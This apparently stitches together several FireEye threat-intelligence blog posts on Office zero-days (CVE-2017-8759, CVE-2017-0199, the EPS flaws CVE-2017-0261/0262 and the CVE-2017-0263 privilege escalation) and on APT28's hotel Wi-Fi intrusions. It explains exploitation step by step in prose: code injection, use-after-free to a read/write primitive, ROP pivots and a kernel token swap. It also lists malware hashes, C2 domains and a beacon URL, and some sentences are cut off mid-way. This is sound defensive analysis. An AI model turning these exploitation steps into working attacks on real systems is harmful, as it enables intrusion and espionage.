From January 2018 to March 2018, through FireEye’s Dynamic Threat
Intelligence, we observed attackers leveraging the latest code
execution and persistence techniques to distribute malicious
macro-based documents to individuals in As…
From January 2018 to March 2018, through FireEye’s Dynamic Threat
Intelligence, we observed attackers leveraging the latest code
execution and persistence techniques to distribute malicious
macro-based documents to individuals in As…
FireEye recently detected a malicious Microsoft Office RTF document
that leveraged CVE-2017-8759,
a SOAP WSDL
parser code injection vulnerability. This vulnerability allows a
malicious actor to inject arbitrary code during the parsing of SOAP
WSDL definition contents. FireEye analyzed a Microsoft Word document
where attackers used the arbitrary code injection to download and
execute a Visual Basic script that contained PowerShell commands.
FireEye shared the details of the vulnerability with Microsoft and
has been coordinating public disclosure timed with the release of a
patch to address the vulnerability and security guidance, which can be
FireEye email, endpoint and network products detected the malicious documents.
The malicious document, “Проект.doc” (MD5:
fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a
Russian speaker. Upon successful exploitation of CVE-2017-8759, the
document downloads multiple components (details follow), and
eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).
FINSPY malware, also reported as FinFisher or WingBird,
is available for purchase as part of a “lawful intercept” capability.
Based on this and previous use of FINSPY,
we assess with moderate confidence that this malicious document was
used by a nation-state to target a Russian-speaking entity for cyber
espionage purposes. Additional detections by FireEye’s Dynamic Threat
Intelligence system indicates that related activity, though
potentially for a different client, might have occurred as early as
A code injection vulnerability exists in the WSDL parser module
within the PrintClientProxy method (http://referencesource.microsoft.com/
– System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The
IsValidUrl does not perform correct validation if provided data that
contains a CRLF sequence. This allows an attacker to inject and
execute arbitrary code. A portion of the vulnerable code is shown in
Figure 1: Vulnerable WSDL Parser
When multiple address definitions are provided in a SOAP
response, the code inserts the “//base.ConfigureProxy(this.GetType(),”
string after the first address, commenting out the remaining
addresses. However, if a CRLF sequence is in the additional addresses,
the code following the CRLF will not be commented out. Figure 2 shows
that due to lack validation of CRLF, a
System.Diagnostics.Process.Start method call is injected. The
generated code will be compiled by csc.exe of .NET framework, and
loaded by the Office executables as a DLL.
Figure 2: SOAP definition VS Generated code
The attacks that FireEye observed in the wild leveraged a Rich Text
Format (RTF) document, similar to the CVE-2017-0199
documents we previously reported on. The malicious sampled contained
an embedded SOAP monikers to facilitate exploitation (Figure 3).
Figure 3: SOAP Moniker
The payload retrieves the malicious SOAP WSDL definition from an
attacker-controlled server. The WSDL parser, implemented in
System.Runtime.Remoting.ni.dll of .NET framework, parses the content
and generates a .cs source code at the working directory. The csc.exe
of .NET framework then compiles the generated source code into a
library, namely http[url path].dll. Microsoft Office then loads the
library, completing the exploitation stage. Figure 4 shows an example
library loaded as a result of exploitation.
Figure 4: DLL loaded
Upon successful exploitation, the injected code creates a new
process and leverages mshta.exe to retrieve a HTA script named
“word.db” from the same server. The HTA script removes the source
code, compiled DLL and the PDB files from disk and then downloads and
executes the FINSPY malware named “left.jpg,” which in spite of the
.jpg extension and “image/jpeg” content-type, is actually an
executable. Figure 5 shows the details of the PCAP of this malware transfer.
Figure 5: Live requests
The malware will be placed at
%appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe.
Figure 6 shows the process create chain under Process Monitor.
Figure 6: Process Created Chain
The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant
of FINSPY. It leverages heavily obfuscated code that employs a
built-in virtual machine – among other anti-analysis techniques – to
make reversing more difficult. As likely another unique anti-analysis
technique, it parses its own full path and searches for the string
representation of its own MD5 hash. Many resources, such as analysis
tools and sandboxes, rename files/samples to their MD5 hash in order
to ensure unique filenames. This variant runs with a mutex of “WininetStartupMutex0”.
CVE-2017-8759 is the second zero-day vulnerability used to
distribute FINSPY uncovered by FireEye in 2017. These exposures
demonstrate the significant resources available to “lawful intercept”
companies and their customers. Furthermore, FINSPY has been sold to
multiple clients, suggesting the vulnerability was being used against
It is possible that CVE-2017-8759 was being used by additional
actors. While we have not found evidence of this, the zero day being
used to distribute FINSPY in April 2017, CVE-2017-0199 was
simultaneously being used by a financially motivated actor. If the
actors behind FINSPY obtained this vulnerability from the same source
used previously, it is possible that source sold it to additional actors.
Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team,
FireEye FLARE Team and FireEye iSIGHT Intelligence for their
contributions to this blog. We also thank everyone from the Microsoft
Security Response Center (MSRC) who worked with us on this issue.
FireEye has moderate confidence that a campaign targeting the
hospitality sector is attributed to Russian actor APT28.
We believe this activity, which dates back to at least July 2017, was
intended to target travelers to hotels throughout Europe and the
Middle East. The actor has used several notable techniques in these
incidents such as sniffing passwords from Wi-Fi traffic, poisoning the
NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.
FireEye has uncovered a malicious document sent in spear phishing
emails to multiple companies in the hospitality industry, including
hotels in at least seven European countries and one Middle Eastern
country in early July. Successful execution of the macro within the
malicious document results in the installation of APT28’s signature GAMEFISH malware.
The malicious document – Hotel_Reservation_Form.doc (MD5:
9b10685b774a783eabfecdb6119a8aa3), as seen in Figure 1 – contains a
macro that base64 decodes a dropper that then deploys APT28’s
signature GAMEFISH malware (MD5: 1421419d1be31f1f9ea60e8ed87277db),
which uses mvband.net and mvtband.net as command and control (C2) domains.
Figure 1: Hotel_Reservation_Form.doc
APT28 is using novel techniques involving the EternalBlue exploit
and the open source tool Responder to spread
laterally through networks and likely target travelers. Once inside
the network of a hospitality company, APT28 sought out machines that
controlled both guest and internal Wi-Fi networks. No guest
credentials were observed being stolen at the compromised hotels;
however, in a separate incident that occurred in Fall 2016, APT28
gained initial access to a victim’s network via credentials likely
stolen from a hotel Wi-Fi network.
Upon gaining access to the machines connected to corporate and guest
Wi-Fi networks, APT28 deployed Responder. Responder facilitates
NetBIOS Name Service (NBT-NS) poisoning. This technique listens for
NBT-NS (UDP/137) broadcasts from victim computers attempting to
connect to network resources. Once received, Responder masquerades as
the sought-out resource and causes the victim computer to send the
username and hashed password to the attacker-controlled machine. APT28
used this technique to steal usernames and hashed passwords that
allowed escalation of privileges in the victim network.
To spread through the hospitality company’s network, APT28 used a
version of the EternalBlue SMB exploit. This was combined with the
heavy use of py2exe to compile Python scripts. This is the first time
we have seen APT28 incorporate this exploit into their intrusions.
In the 2016 incident, the victim was compromised after connecting to
a hotel Wi-Fi network. Twelve hours after the victim initially
connected to the publicly available Wi-Fi network, APT28 logged into
the machine with stolen credentials. These 12 hours could have been
used to crack a hashed password offline. After successfully accessing
the machine, the attacker deployed tools on the machine, spread
laterally through the victim’s network, and accessed the victim’s OWA
account. The login originated from a computer on the same subnet,
indicating that the attacker machine was physically close to the
victim and on the same Wi-Fi network.
We cannot confirm how the initial credentials were stolen in the
2016 incident; however, later in the intrusion, Responder was
deployed. Since this tool allows an attacker to sniff passwords from
network traffic, it could have been used on the hotel Wi-Fi network to
obtain a user’s credentials.
Cyber espionage activity against the hospitality industry is
typically focused on collecting information on or from hotel guests of
interest rather than on the hotel industry itself, though actors may
also collect information on the hotel as a means of facilitating
operations. Business and government personnel who are traveling,
especially in a foreign country, often rely on systems to conduct
business other than those at their home office, and may be unfamiliar
with threats posed while abroad.
APT28 isn’t the only group targeting travelers. South Korea-nexus
Fallout Team (aka Darkhotel) has used spoofed
software updates on infected Wi-Fi networks in Asian hotels, and
Duqu 2.0 malware has been found
on the networks of European hotels used by participants in the
Iranian nuclear negotiations. Additionally, open sources have reported
for several years that in Russia and China, high-profile hotel guests
may expect their hotel
rooms to be accessed and their laptops and other electronic devices accessed.
These incidents show a novel infection vector being used by APT28.
The group is leveraging less secure hotel Wi-Fi networks to steal
credentials and a NetBIOS Name Service poisoning utility to escalate
privileges. APT28’s already wide-ranging capabilities and tactics are
continuing to grow and refine as the group expands its infection vectors.
Travelers must be aware of the threats posed when traveling –
especially to foreign countries – and take extra precautions to secure
their systems and data. Publicly accessible Wi-Fi networks present a
significant threat and should be avoided whenever possible.
Additional technical information and details are available to FireEye
iSIGHT Intelligence customers through our portal.
In 2015, FireEye published details about two attacks exploiting
vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office.
One was a zero-day
and one was patched
weeks before the attack launched.
Recently, FireEye identified three new zero-day vulnerabilities in
Microsoft Office products that are being exploited in the wild.
At the end of March 2017, we detected another malicious document
leveraging an unknown vulnerability in EPS and a recently patched
vulnerability in Windows Graphics Device Interface (GDI) to drop
malware. Following the April 2017 Patch Tuesday, in which Microsoft
disabled EPS, FireEye detected a second unknown vulnerability in EPS.
FireEye believes that two actors – Turla
and an unknown financially motivated actor – were using the first EPS
was using the second EPS zero-day (CVE-2017-0262)
along with a new Escalation of Privilege (EOP) zero-day (CVE-2017-0263).
Turla and APT28 are Russian cyber espionage groups that have used
these zero-days against European diplomatic and military entities. The
unidentified financial group targeted regional and global banks with
offices in the Middle East. The following is a description of the EPS
zero-days, associated malware, and the new EOP zero-day. Each EPS
zero-day is accompanied by an EOP exploit, with the EOP being required
to escape the sandbox that executes the FLTLDR.EXE instance used for
The malicious documents have been used to deliver three different
payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and
NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was
used to deliver GAMEFISH (APT28). CVE-2017-0263 is used to escalate
privileges during the delivery of the GAMEFISH payload.
FireEye has been coordinating with the Microsoft Security Response
Center (MSRC) for the responsible disclosure of this information.
Microsoft advises all customers to follow the guidance in security
advisory ADV170005 as a defense-in-depth measure against EPS
Upon opening the Office document, the FLTLDR.EXE is utilized to
render an embedded EPS image, which contains the exploit. The EPS file
is a PostScript program, which leverages a Use-After-Free
vulnerability in “restore” operand.
From the PostScript
Manual: “Allocations in local VM and modifications to existing
objects in local VM are subject to a feature called save and
restore, named after the operators that invoke it. save
and restore bracket a section of a PostScript language program
whose local VM activity is to be encapsulated. restore
deallocates new objects and undoes modifications to existing objects
that were made since the matching save.”
As the manual described, the restore operator will reclaim
memory allocated since the save operator. This makes a perfect
condition of Use-After-Free, when combined with forall
operator. Figure 1 shows the pseudo code to exploit the save and
Figure 1: Pseudo code for the exploit
The following operations allow the Pseudo code to leak metadata
enabling a read/write primitive:
Figure 2 demonstrates a debug log of the uaf_array being used after
Figure 2: uaf_array reclaimed debug log
By manipulating the operations after the save operator, the
attacker is able to manipulate the memory layouts and convert the
Use-After-Free to create a read/write primitive. Figure 3 shows the
faked string, with length set as 0x7fffffff, base as 0.
Figure 3: Faked String Object
Leveraging the power of reading and writing arbitrary user memory,
the EPS program continues by searching for gadgets to build the ROP
chain, and creates a
file object. Figure 4 demonstrates the faked file object
Figure 4: Fake File Object, with ROP
closefile operand with the faked file object, the exploit
pivots to the ROP and starts the shellcode. Figure 5 shows part of the
closefile operand handler.
Figure 5: Stack Pivot disassembler of closefile
Once execution has been achieved, the malware uses the ROP chain to
change the execution protection of the memory region containing the
shellcode. At this point, the shellcode is running within a sandbox
that was executing FLTLDR.EXE and an escalation of privilege is
required to escape that sandbox.
FireEye detected two different versions of the EPS program
exploiting this vulnerability. The first, st07383.en17.docx,
continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to
containing a malware implant known as SHIRIME. SHIRIME is one of
payload to conduct initial profiling of a target system and implement
command and control. Since early 2016, we have observed multiple
iterations of SHIRIME used in the wild, having the most recent version
(v1.0.1004) employed in this zero-day
The second document, Confirmation_letter.docx, continues by
utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege
before dropping a new variant of the NETWIRE malware family. Several
versions of this document were seen with similar filenames.
The EPS programs contained within these documents contained
different logic to perform the construction of the ROP chain as well
as build the shellcode. The first took the additional step of using a
simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.
Figure 6: Shellcode obfuscation algorithm
The second EPS vulnerability is a type confused procedure object of
forall operator that can alter the execution flow allowing an attacker
to control values onto the operand stack. This vulnerability was found
in a document named “Trump’s_Attack_on_Syria_English.docx”.
Before triggering the vulnerability, the EPS program sprays the
memory with predefined data to occupy specific memory address and
facilitate the exploitation. Figure 7 demonstrates the PostScript code
snippet of spraying memory with a string.
Figure 7: PostScript code snippet of spray
After execution, the content of string occupies the memory at
address 0x0d80d000, leading to the memory layout as shown in Figure 8.
The exploit leverages this layout and the content to forge a procedure
object and manipulate the code flow to store predefined value, in
yellow, to the operator stack.
Figure 8: Memory layout of the sprayed data
After spraying the heap, the exploit goes on to call a code
statement in the following format: 1 array 16#D80D020 forall.
It creates an Array object, sets the procedure as the hex number
0xD80D020, and calls the forall operator. During the operation
of the forged procedure within forall operator, it precisely
controls the execution flow to store values of the attacker’s choices
to operand stack. Figure 9 shows the major code flow consuming the
Figure 9: Consuming the forged procedure
After execution of forall, the contents on the stack are
under the attacker’s control. This is s shown in Figure 10.
Figure 10: Stack after the forall execution
Since the operand stack has been manipulated, the subsequent
operations of exch defines objects based on the data from the
manipulated stack, as shown in Figure 11.
Figure 11: Subsequent code to retrieve data from stack
The A18 is a string type object, which has a length field of
0x7ffffff0, based from 0. Within memory, the layout as shown in Figure 12.
Figure 12: A18 String Object
The A19 is an array type object, with member values all purposely
crafted. The exploit defines another array object and puts it into the
forged array A19. By performing these operations, it puts the newly
created array object pointer into A19. The exploit can then directly
read the value from the predictable address, 0xD80D020 + 0x38, and
leak its vftable and infer module base address of EPSIMP32.flt. Figure
13 shows code snippets of leaking EPSIMP32 base address.
Figure 13: Code snippet of leaking module base
Figure 14 shows the operand stack of calling put operator and
the forged Array A19 after finishing the put operation.
Figure 14: Array A19 after the put operation
By leveraging the RW primitive string and the leaked module base of
EPSIMP32, the exploit continues by searching ROP gadgets, creating a
fake file object, and pivoting to shellcode through the
bytesavailable operator. Figure 15 shows the forged file type
object and disassembling of pivoting to ROP and shellcode.
Figure 15: Pivots to ROP and Shellcode
The shellcode continues by using a previously unknown EOP,
CVE-2017-0263, to escalate privileges to escape the sandbox running
FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a
32-bit version of CVE-2017-0263 is contained in the shellcode.
The EOP Exploit setup starts by suspending all threads other than
the current thread and saving the thread handles to a table, as shown
in Figure 16.
Figure 16: Suspending Threads
The exploit then checks for OS version and uses that information to
populate version specific fields such as token offset, syscall number,
etc. An executable memory area is allocated and populated with kernel
mode shellcode as wells as address information required by the
shellcode. A new thread is created for triggering the vulnerability
and further control of exploitation.
The exploit starts by creating three PopupMenus and appending menus
to them, as shown in Figure 17. The exploit creates 0x100 windows with
random classnames. The User32!HMValidateHandle trick is used to leak
the tagWnd address, which is used as kernel information leak
throughout the exploit.
Figure 17: Popup menu creation
RegisterClassExW is then used to register a window class
“Main_Window_Class” with a WndProc pointing to a function, which calls
DestroyWindow on window table created by EventHookProc, explained
later in the blog. This function also shows the first popup menu,
which was created earlier.
Two extra windows are created with class name as
“Main_Window_Class”. SetWindowLong is used to change WndProc of second
window, wnd2, to a shellcode address. An application defined hook,
WindowHookProc, and an event hook, EventHookProc, are installed by
SetWindowsHookExW and SetWinEventHook respectively. PostMessage is
used to post 0xABCD to first window, wnd1.
The EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves
the window’s handle to a table. WindowHookProc looks for SysShadow
classname and sets a new WndProc for the corresponding window.
Inside this WndProc, NtUserMNDragLeave syscall is invoked and
SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode
shown in Figure 18.
Figure 18: Triggering the shellcode
The Use-After-Free happens inside WM_NCDESTROY event in kernel and
overwrites wnd2’s tagWnd structure, which sets bServerSideWindowProc
flag. With bServerSideWindowProc set, the user mode WndProc is
considered as a kernel callback and will be invoked from kernel
context – in this case wnd2’s WndProc is the shellcode.
The shellcode checks whether the memory corruption has occurred by
checking if the code segment is not the user mode code segment. It
also checks whether the message sent is 0x9f9f. Once the validation is
completed, shellcode finds the TOKEN address of current process and
TOKEN of system process (pid 4). The shellcode then copies the system
process’ token to current process, which elevates current process
privilege to SYSTEM.
EPS processing has become a ripe exploitation space for attackers.
FireEye has discovered and analyzed two of these recent EPS
zero-days with examples seen before and after Microsoft disabled EPS
processing in the April 2017 Patch Tuesday. The documents explored
utilize differing EPS exploits, ROP construction, shellcode, EOP
exploits and final payloads. While these documents are detected by
FireEye appliances, users should exercise caution because FLTLDR.EXE
is not monitored by EMET.
Russian cyber espionage is a well-resourced, dynamic threat
The use of zero-day exploits by Turla Group and APT28 underscores
their capacity to apply technically sophisticated and costly methods
when necessary. Russian cyber espionage actors use zero-day exploits
in addition to less complex measures. Though these actors have relied
on credential phishing and macros to carry out operations previously,
the use of these methods does not reflect a lack of resources. Rather,
the use of less technically sophisticated methods – when sufficient –
reflects operational maturity and the foresight to protect costly
exploits until they are necessary.
A vibrant ecosystem of threats
CVE-2017-0261’s use by multiple actors is further evidence that
cyber espionage and criminal activity exist in a shared ecosystem.
Nation state actors, such as those leveraging CVE-2017-0199
to distribute FINSPY, often rely on the same sources for
exploits as criminal actors. This shared ecosystem creates a
proliferation problem for defenders concerned with either type of threat.
CVE-2017-0261 was being used as a zero-day by both nation state and
cyber crime actors, and we believe that both actors obtained the
vulnerability from a common source. Following CVE-2017-0199,
this is the second major vulnerability in as many months that has been
used for both espionage and crime.
Table 1: Source Exploit Documents
Table 2: CVEs related to these attacks
iSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft
Security Response Center (MSRC).
FireEye recently identified a vulnerability – CVE-2017-0199 – that
allows a malicious actor to download and execute a Visual Basic script
containing PowerShell commands when a user opens a Microsoft Office
RTF document containing an embedded exploit. We worked with Microsoft
the technical details of this vulnerability as soon as a patch
was made available.
In this follow-up post, we discuss some of the campaigns we observed
leveraging the CVE-2017-0199 zero-day in the days, weeks and months
leading up to the patch being released.
FireEye assesses with moderate confidence that CVE-2017-0199 was
leveraged by financially motivated and nation-state actors prior to
its disclosure. Actors leveraging FINSPY and LATENTBOT used the
zero-day as early as January and March, and similarities between their
implementations suggest they obtained exploit code from a shared
source. Recent DRIDEX activity began following a disclosure on April
As early as Jan. 25,2017, lure documents referencing a
Russian Ministry of Defense decree and a manual allegedly published in
the “Donetsk People’s Republic” exploited CVE-2017-0199 to
deliver FINSPY payloads. Though we have not identified the targets,
FINSPY is sold by Gamma Group to multiple nation-state clients, and we
assess with moderate confidence that it was being used along with the
zero-day to carry out cyber espionage.
The malicious document, СПУТНИК РАЗВЕДЧИКА.doc (MD5:
c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely
available military training manual (Figure 1). Notably, this version
purports to have been published in the “Donetsk People’s Republic,”
the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.
The initial malicious document downloaded further payloads,
including malware and a decoy document from 126.96.36.199. This site
was open indexed to allow recovery of additional lure content,
including prikaz.doc (MD5: 0F2B7068ABFF00D01CA7E64589E5AFD9), which
claims to be a Russian Ministry of Defense decree approving a forest
Per a 2015 report
from CitizenLab, Gamma Group licenses their software to clients and
each client uses unique infrastructure, making it likely that the two
documents are being used by a single client.
FINSPY malware is sold by Gamma Group, an Anglo-German “lawful
intercept” company. Gamma Group works on behalf of numerous
nation-state clients, limiting insight into the ultimate sponsor of
the activity. The FINSPY malware was heavily obfuscated, preventing
the extraction of command and control (C2) information.
Figure 1: FINSPY Lure Purporting to be Russian
As early as March 4, 2017, malicious documents exploiting
CVE-2017-0199 were used to deliver the LATENTBOT
malware. The malware, which includes credential theft capability,
has thus far only been observed by FireEye iSIGHT Intelligence in
financially motivated threat activity. Additionally, generic lures
used in this most recent campaign are consistent with methods employed
by financially motivated actors.
LATENTBOT is a modular and highly obfuscated type of malware first
discovered by FireEye iSIGHT intelligence in December 2015. It is
capable of a variety of functions, including credential theft, hard
drive and data wiping, disabling security software, and remote desktop
functionality. Recently, we observed LATENTBOT campaigns using
Microsoft Word Intruder (MWI).
The lure documents distributing LATENTBOT malware used generic
social engineering. The documents that were used are shown in Table 1,
and all used 188.8.131.52 as a C2 domain.
Table 1: LATENTBOT Documents
On April 10, the actors altered their infrastructure to deliver
TERDOT payloads instead of LATENTBOT. This TERDOT payload (MD5:
e3b600a59eea9b2ea7a0d4e3c45074da) beacons to
http://184.108.40.206/SBz1efFx/gt45gh.php, then downloads a Tor client
and beacons to sudoofk3wgl2gmxm.onion.
Shared artifacts in the FINSPY and LATENTBOT samples suggest the
same builder was used to create both, indicating the zero-day exploit
was supplied to both criminal and cyber espionage operations from the
Malicious documents used in both campaigns share a last revision
time of: 2016-11-27 22:42:00 (Figure 2).
Figure 2: Revision Time Artifact Shared Between
FINSPY and LATENTBOT Samples
Following a disclosure of specifics related to the zero-day on April
7, 2017, the vulnerability was used in DRIDEX spam campaigns, which
continue as of the publication of this blog. We cannot confirm the
mechanism through which the actors obtained the exploit. These actors
may have leveraged knowledge of the vulnerability gained through the
disclosure, or been given access to it when it became clear that
patching was imminent.
A spam wave was sent out on April 10, 2017, leveraging a “Scan Data”
lure. The attached document leveraged CVE-2017-0199 to install DRIDEX
on the victim’s computer.
Though only one FINSPY user has been observed leveraging this
zero-day exploit, the historic scope of FINSPY, a capability used by
several nation states, suggests other customers had access to it.
Additionally, this incident exposes the global nature of cyber threats
and the value of worldwide perspective – a cyber espionage incident
targeting Russians can provide an opportunity to learn about and
interdict crime against English speakers elsewhere.